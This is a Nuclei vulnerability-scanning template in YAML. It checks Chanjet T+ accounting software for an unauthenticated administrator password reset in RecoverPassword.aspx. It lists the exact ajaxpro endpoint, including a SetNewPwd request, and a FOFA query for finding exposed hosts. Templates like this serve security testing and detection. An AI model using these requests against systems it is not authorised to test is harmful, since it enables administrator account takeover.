30 lines
1.2 KiB
YAML
30 lines
1.2 KiB
YAML
id: chanjet-tplus-unauth-passreset
|
|
|
|
info:
|
|
name: Chanjet Tplus - Unauthorized Password Reset
|
|
author: 0xr2r
|
|
severity: high
|
|
description: |
|
|
There is an unauthorized administrator password modification vulnerability in UF Chanjet T+ RecoverPassword.aspx. An attacker can use this vulnerability to modify the administrator account password to log in to the backend.
|
|
reference:
|
|
- https://cn-sec.com/archives/1377207.html
|
|
- https://www.chanjet.com
|
|
metadata:
|
|
max-request: 2
|
|
verified: true
|
|
fofa-query: app="畅捷通-TPlus"
|
|
tags: tplus,unauth,chanjet
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method={{randbase(6)}}"
|
|
- "{{BaseURL}}/tplus/ajaxpro/RecoverPassword,App_Web_recoverpassword.aspx.cdcab7d2.ashx?method=SetNewPwd"
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- "contains(body_1, 'tplus”应用程序中的服务器错误')"
|
|
- "!contains(body_2, '>请重新登录')"
|
|
condition: and
|
|
# digest: 4a0a004730450220196561bdf0315ff002edd2dc6b8f06301ec41ce768ac8d6c35924d431022b2cf022100f055d89d18959e389d8e5737f54ba35089dc0756d78b21a2a0358d536f1ab8ed:922c64590222798bb761d5b6d8e72950 |